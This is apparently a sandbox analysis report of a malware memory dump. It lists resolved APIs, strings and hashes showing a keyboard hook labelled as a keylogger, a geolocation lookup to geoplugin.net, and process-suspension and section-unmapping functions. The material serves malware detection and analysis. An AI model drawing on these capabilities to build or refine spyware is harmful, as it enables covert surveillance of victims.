calls 48113->48157 48115 414ffa 48114->48115 48116 401e65 22 API calls 48115->48116 48118 41500b 48116->48118 48117 406c1e 28 API calls 48117->48157 48120 401e65 22 API calls 48118->48120 48119 401fe2 28 API calls 48119->48157 48121 41501c 48120->48121 48122 401e65 22 API calls 48121->48122 48123 41502e 48122->48123 48949 40473d 89 API calls 48123->48949 48125 401fd8 11 API calls 48125->48157 48126 401e65 22 API calls 48126->48157 48128 41518c WSAGetLastError 48950 41cae1 30 API calls 48128->48950 48132 402093 28 API calls 48134 41519c 
48132->48134 48134->48132 48136 41b4ef 80 API calls 48134->48136 48139 401e8d 11 API calls 48134->48139 48140 401e65 22 API calls 48134->48140 48141 43baac _strftime 40 API calls 48134->48141 48134->48157 48177 415a71 CreateThread 48134->48177 48178 401fd8 11 API calls 48134->48178 48179 401f09 11 API calls 48134->48179 48951 4052fd 28 API calls 48134->48951 48953 40b051 85 API calls 48134->48953 48954 404e26 99 API calls 48134->48954 48136->48134 48138 40531e 28 API calls 48138->48157 48139->48134 48140->48134 48142 415acf Sleep 48141->48142 48142->48134 48143 406383 28 API calls 48143->48157 48144 402f10 28 API calls 48144->48157 48145 402093 28 API calls 48145->48157 48146 41b4ef 80 API calls 48146->48157 48149 40905c 28 API calls 48149->48157 48150 441e81 20 API calls 48150->48157 48151 4136f8 3 API calls 48151->48157 48152 4135a6 31 API calls 48152->48157 48153 40417e 28 API calls 48153->48157 48157->48110 48157->48113 48157->48117 48157->48119 48157->48125 48157->48126 48157->48128 48157->48134 48157->48138 48157->48143 48157->48144 48157->48145 48157->48146 48157->48149 48157->48150 48157->48151 48157->48152 48157->48153 48158 41bb8e 28 API calls 48157->48158 48159 401e65 22 API calls 48157->48159 48815 414ee9 48157->48815 48820 40482d 48157->48820 48827 404f51 48157->48827 48842 4048c8 connect 48157->48842 48902 41b7e0 48157->48902 48905 4145bd 48157->48905 48908 40dd89 48157->48908 48914 41bc42 48157->48914 48917 41bd1e 48157->48917 48158->48157 48160 415439 GetTickCount 48159->48160 48161 41bb8e 28 API calls 48160->48161 48174 415456 48161->48174 48163 41bb8e 28 API calls 48163->48174 48166 41bd1e 28 API calls 48166->48174 48168 406383 28 API calls 48168->48174 48169 402ea1 28 API calls 48169->48174 48170 402f10 28 API calls 48170->48174 48172 401fd8 11 API calls 48172->48174 48173 401f09 11 API calls 48173->48174 48174->48163 48174->48166 48174->48168 48174->48169 48174->48170 48174->48172 48174->48173 48921 41bae6 48174->48921 48923 41ba96 48174->48923 
48928 40f8d1 29 API calls 48174->48928 48929 402f31 28 API calls 48174->48929 48930 404c10 48174->48930 48952 404aa1 61 API calls _Yarn 48174->48952 48177->48134 49137 41ad17 105 API calls 48177->49137 48178->48134 48179->48134 48180->47352 48181->47359 48182->47363 48185 4020df 11 API calls 48184->48185 48186 406c2a 48185->48186 48187 4032a0 28 API calls 48186->48187 48188 406c47 48187->48188 48188->47385 48190 413573 RegQueryValueExA RegCloseKey 48189->48190 48191 40eba4 48189->48191 48190->48191 48191->47382 48191->47400 48192->47388 48193->47418 48194->47412 48195->47402 48196->47416 48198 401f86 11 API calls 48197->48198 48199 40da50 48198->48199 48200 40da70 48199->48200 48201 40daa5 48199->48201 48216 40da66 48199->48216 49138 41b5b4 29 API calls 48200->49138 48203 41bfb7 GetCurrentProcess 48201->48203 48202 40db99 GetLongPathNameW 48205 40417e 28 API calls 48202->48205 48206 40daaa 48203->48206 48208 40dbae 48205->48208 48209 40db00 48206->48209 48210 40daae 48206->48210 48207 40da79 48211 401f13 28 API calls 48207->48211 48212 40417e 28 API calls 48208->48212 48213 40417e 28 API calls 48209->48213 48214 40417e 28 API calls 48210->48214 48215 40da83 48211->48215 48217 40dbbd 48212->48217 48218 40db0e 48213->48218 48219 40dabc 48214->48219 48220 401f09 11 API calls 48215->48220 48216->48202 49141 40ddd1 28 API calls 48217->49141 48224 40417e 28 API calls 48218->48224 48225 40417e 28 API calls 48219->48225 48220->48216 48222 40dbd0 49142 402fa5 28 API calls 48222->49142 48227 40db24 48224->48227 48228 40dad2 48225->48228 48226 40dbdb 49143 402fa5 28 API calls 48226->49143 49140 402fa5 28 API calls 48227->49140 49139 402fa5 28 API calls 48228->49139 48232 40dbe5 48236 401f09 11 API calls 48232->48236 48233 40db2f 48237 401f13 28 API calls 48233->48237 48234 40dadd 48235 401f13 28 API calls 48234->48235 48239 40dae8 48235->48239 48240 40dbef 48236->48240 48238 40db3a 48237->48238 48241 401f09 11 API calls 48238->48241 48242 401f09 11 API calls 48239->48242 
48243 401f09 11 API calls 48240->48243 48245 40db43 48241->48245 48246 40daf1 48242->48246 48244 40dbf8 48243->48244 48247 401f09 11 API calls 48244->48247 48248 401f09 11 API calls 48245->48248 48249 401f09 11 API calls 48246->48249 48250 40dc01 48247->48250 48248->48215 48249->48215 48251 401f09 11 API calls 48250->48251 48252 40dc0a 48251->48252 48253 401f09 11 API calls 48252->48253 48254 40dc13 48253->48254 48254->47476 48255->47488 48256->47510 48258 41371e RegQueryValueExA RegCloseKey 48257->48258 48259 413742 48257->48259 48258->48259 48259->47466 48260->47502 48261->47539 48262->47548 48263->47572 48264->47560 48266->47604 48267->47407 48270 41b4c5 LoadResource LockResource SizeofResource 48269->48270 48271 40f3de 48269->48271 48270->48271 48272 43bd51 48271->48272 48277 446137 ___crtLCMapStringA 48272->48277 48273 446175 48289 4405dd 20 API calls __dosmaperr 48273->48289 48274 446160 RtlAllocateHeap 48276 446173 48274->48276 48274->48277 48276->47862 48277->48273 48277->48274 48288 442f80 7 API calls 2 library calls 48277->48288 48280 4020bf 48279->48280 48290 4023ce 48280->48290 48282 4020ca 48294 40250a 48282->48294 48284 4020d9 48284->47865 48286 4020b7 28 API calls 48285->48286 48287 406dec 48286->48287 48287->47872 48288->48277 48289->48276 48291 4023d8 48290->48291 48292 402428 48290->48292 48291->48292 48301 4027a7 11 API calls std::_Deallocate 48291->48301 48292->48282 48295 40251a 48294->48295 48296 402520 48295->48296 48297 402535 48295->48297 48302 402569 48296->48302 48312 4028e8 28 API calls 48297->48312 48300 402533 48300->48284 48301->48292 48313 402888 48302->48313 48304 40257d 48305 402592 48304->48305 48306 4025a7 48304->48306 48318 402a34 22 API calls 48305->48318 48320 4028e8 28 API calls 48306->48320 48309 40259b 48319 4029da 22 API calls 48309->48319 48311 4025a5 48311->48300 48312->48300 48314 402890 48313->48314 48315 402898 48314->48315 48321 402ca3 22 API calls 48314->48321 48315->48304 48318->48309 48319->48311 48320->48311 
48323 4020e7 48322->48323 48324 4023ce 11 API calls 48323->48324 48325 4020f2 48324->48325 48325->47890 48331 40423a 48326->48331 48329->47890 48330->47900 48332 404243 48331->48332 48333 4023ce 11 API calls 48332->48333 48334 40424e 48333->48334 48335 402569 28 API calls 48334->48335 48336 4041b5 48335->48336 48336->47890 48337->47904 48338->47909 48339->47907 48343 4032aa 48341->48343 48342 4032c9 48342->47920 48343->48342 48345 4028e8 28 API calls 48343->48345 48345->48342 48347 4051fb 48346->48347 48356 405274 48347->48356 48349 405208 48349->47923 48351 402061 48350->48351 48352 4023ce 11 API calls 48351->48352 48353 40207b 48352->48353 48380 40267a 48353->48380 48357 405282 48356->48357 48358 405288 48357->48358 48359 40529e 48357->48359 48367 4025f0 48358->48367 48361 4052f5 48359->48361 48362 4052b6 48359->48362 48377 4028a4 22 API calls 48361->48377 48366 40529c 48362->48366 48376 4028e8 28 API calls 48362->48376 48366->48349 48368 402888 22 API calls 48367->48368 48369 402602 48368->48369 48370 402672 48369->48370 48372 402629 48369->48372 48379 4028a4 22 API calls 48370->48379 48375 40263b 48372->48375 48378 4028e8 28 API calls 48372->48378 48375->48366 48376->48366 48378->48375 48381 40268b 48380->48381 48382 4023ce 11 API calls 48381->48382 48383 40208d 48382->48383 48383->47926 48384->47928 48385->47939 48388 41bfc4 GetCurrentProcess 48387->48388 48389 41b2d1 48387->48389 48388->48389 48390 4135a6 RegOpenKeyExA 48389->48390 48391 4135d4 RegQueryValueExA RegCloseKey 48390->48391 48392 4135fe 48390->48392 48391->48392 48393 402093 28 API calls 48392->48393 48394 413613 48393->48394 48394->47950 48395->47961 48397 40b90c 48396->48397 48402 402252 48397->48402 48399 40b917 48406 40b92c 48399->48406 48401 40b926 48401->47969 48403 40225c 48402->48403 48404 4022ac 48402->48404 48403->48404 48413 402779 11 API calls std::_Deallocate 48403->48413 48404->48399 48407 40b966 48406->48407 48408 40b938 48406->48408 48425 4028a4 22 API calls 48407->48425 48414 
4027e6 48408->48414 48412 40b942 48412->48401 48413->48404 48415 4027ef 48414->48415 48416 402851 48415->48416 48417 4027f9 48415->48417 48427 4028a4 22 API calls 48416->48427 48420 402802 48417->48420 48421 402815 48417->48421 48426 402aea 28 API calls __EH_prolog 48420->48426 48423 402813 48421->48423 48424 402252 11 API calls 48421->48424 48423->48412 48424->48423 48426->48423 48428->47978 48430 402347 48429->48430 48431 402252 11 API calls 48430->48431 48432 4023c7 48431->48432 48432->47978 48434 4024f9 48433->48434 48435 40250a 28 API calls 48434->48435 48436 4020b1 48435->48436 48436->47482 48453 43ba0a 48437->48453 48439 43ae50 48440 43a7b7 __cftof 36 API calls 48439->48440 48445 43ae5c 48440->48445 48441 43ae15 48441->48439 48442 43ae2a 48441->48442 48452 43ae2f __cftof 48441->48452 48458 4405dd 20 API calls __dosmaperr 48442->48458 48446 43ae8b 48445->48446 48459 43ba4f 40 API calls __Toupper 48445->48459 48449 43aef7 48446->48449 48460 43b9b6 20 API calls 2 library calls 48446->48460 48461 43b9b6 20 API calls 2 library calls 48449->48461 48450 43afbe _strftime 48450->48452 48462 4405dd 20 API calls __dosmaperr 48450->48462 48452->48007 48454 43ba22 48453->48454 48455 43ba0f 48453->48455 48454->48441 48463 4405dd 20 API calls __dosmaperr 48455->48463 48457 43ba14 __cftof 48457->48441 48458->48452 48459->48445 48460->48449 48461->48450 48462->48452 48463->48457 48470 401fb0 48464->48470 48466 402f1e 48467 402055 11 API calls 48466->48467 48468 402f2d 48467->48468 48468->48021 48469->48024 48471 4025f0 28 API calls 48470->48471 48472 401fbd 48471->48472 48472->48466 48474 40a127 48473->48474 48475 413549 3 API calls 48474->48475 48476 40a12e 48475->48476 48477 40a142 48476->48477 48478 40a15c 48476->48478 48479 409e9b 48477->48479 48480 40a147 48477->48480 48494 40905c 48478->48494 48479->47533 48482 40905c 28 API calls 48480->48482 48484 40a155 48482->48484 48522 40a22d 29 API calls 48484->48522 48487 40a15a 48487->48479 48488->48049 48670 403222 
48489->48670 48491 403022 48674 403262 48491->48674 48495 409072 48494->48495 48496 402252 11 API calls 48495->48496 48497 40908c 48496->48497 48523 404267 48497->48523 48499 40909a 48500 40a179 48499->48500 48535 40b8ec 48500->48535 48503 40a1a2 48506 402093 28 API calls 48503->48506 48504 40a1ca 48505 402093 28 API calls 48504->48505 48508 40a1d5 48505->48508 48507 40a1ac 48506->48507 48509 41bc5e 28 API calls 48507->48509 48510 402093 28 API calls 48508->48510 48511 40a1ba 48509->48511 48512 40a1e4 48510->48512 48539 40b164 31 API calls _Yarn 48511->48539 48514 41b4ef 80 API calls 48512->48514 48516 40a1e9 CreateThread 48514->48516 48515 40a1c1 48517 401fd8 11 API calls 48515->48517 48518 40a210 CreateThread 48516->48518 48519 40a204 CreateThread 48516->48519 48547 40a27d 48516->48547 48517->48504 48520 401f09 11 API calls 48518->48520 48544 40a289 48518->48544 48519->48518 48541 40a267 48519->48541 48521 40a224 48520->48521 48521->48479 48522->48487 48669 40a273 163 API calls 48522->48669 48524 402888 22 API calls 48523->48524 48525 40427b 48524->48525 48526 404290 48525->48526 48527 4042a5 48525->48527 48533 4042df 22 API calls 48526->48533 48528 4027e6 28 API calls 48527->48528 48530 4042a3 48528->48530 48530->48499 48531 404299 48534 402c48 22 API calls 48531->48534 48533->48531 48534->48530 48536 40b8f5 48535->48536 48537 40a197 48535->48537 48540 40b96c 28 API calls 48536->48540 48537->48503 48537->48504 48539->48515 48540->48537 48550 40a2b8 48541->48550 48580 40acd6 48544->48580 48622 40a726 48547->48622 48551 40a2d1 GetModuleHandleA SetWindowsHookExA 48550->48551 48552 40a333 GetMessageA 48550->48552 48551->48552 48554 40a2ed GetLastError 48551->48554 48553 40a345 TranslateMessage DispatchMessageA 48552->48553 48564 40a270 48552->48564 48553->48552 48553->48564 48565 41bb8e 48554->48565 48571 441e81 48565->48571 48568 402093 28 API calls 48569 40a2fe 48568->48569 48570 4052fd 28 API calls 48569->48570 48572 441e8d 48571->48572 48575 441c7d 48572->48575 
Control-flow graph (edge list rendered from the report's interactive graph view; node numbering and edges omitted here). Recoverable content: functions in the RegAsm memory dump between 401e65 and 4489a7, with these API calls annotated on the nodes: Sleep, GetTickCount, GetForegroundWindow, GetWindowTextLengthW, GetWindowTextW; EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WaitForSingleObject, WaitForSingleObjectEx, SetEvent, ResetEvent, CreateEventA, CreateEventW, CreateThread, TlsAlloc; CreateDirectoryW, GetFileAttributesW, SetFileAttributesW, PathFileExistsW, CreateFileW, GetFileSize, SetFilePointer, WriteFile, CloseHandle; RegSetValueExA, RegCloseKey; GetSystemDirectoryA, LoadLibraryA, GetProcAddress, FreeLibrary; WSAStartup, getaddrinfo, WSASetLastError, WSAGetLastError, socket, send, recv; InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle; GlobalMemoryStatusEx, GetLocalTime, GetSystemTimeAsFileTime; CryptAcquireContextA, CryptGenRandom, CryptReleaseContext; SetUnhandledExceptionFilter, TerminateProcess, ExitProcess.

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad$HandleModule
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                • API String ID: 4236061018-3687161714
                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                Control-flow Graph

                                Control-flow graph (rendered graph with Executed / Not Executed colouring omitted): basic blocks 40a2b8-40a366, calling GetModuleHandleA, SetWindowsHookExA, GetLastError, GetMessageA, TranslateMessage and DispatchMessageA, with subcalls to 41bb8e, 4052fd, 402093, 41b4ef and 401fd8 on the hook-failure path.
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                • GetLastError.KERNEL32 ref: 0040A2ED
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetMessageA.USER32 ref: 0040A33B
                                • TranslateMessage.USER32(?), ref: 0040A34A
                                • DispatchMessageA.USER32 ref: 0040A355
                                Strings
                                • Keylogger initialization failure: error , xrefs: 0040A301
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

                                Control-flow Graph

                                Control-flow graph (rendered graph with Executed / Not Executed colouring omitted): basic blocks 41b380-41b431, calling InternetOpenW, InternetOpenUrlW, InternetReadFile (in a loop) and InternetCloseHandle twice, with subcalls to 4020df, 43bd51, 4020b7, 403376, 401fd8 and 43bd4c.
                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: ed6e4750be8d51d583a68a6d75bf3866e9d73d32e6528751d06602238a365c91
                                • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                • Opcode Fuzzy Hash: ed6e4750be8d51d583a68a6d75bf3866e9d73d32e6528751d06602238a365c91
                                • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                  • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                                  • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                • ExitProcess.KERNEL32 ref: 0040F8CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 5.0.0 Pro$override$pth_unenc
                                • API String ID: 2281282204-3992771774
                                • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                APIs
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,0088A1A0), ref: 00433849
                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                Strings
                                • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$FileSystem
                                • String ID: GetSystemTimePreciseAsFileTime
                                • API String ID: 2086374402-595813830
                                • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                APIs
                                • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                • Instruction Fuzzy Hash:

                                Control-flow Graph

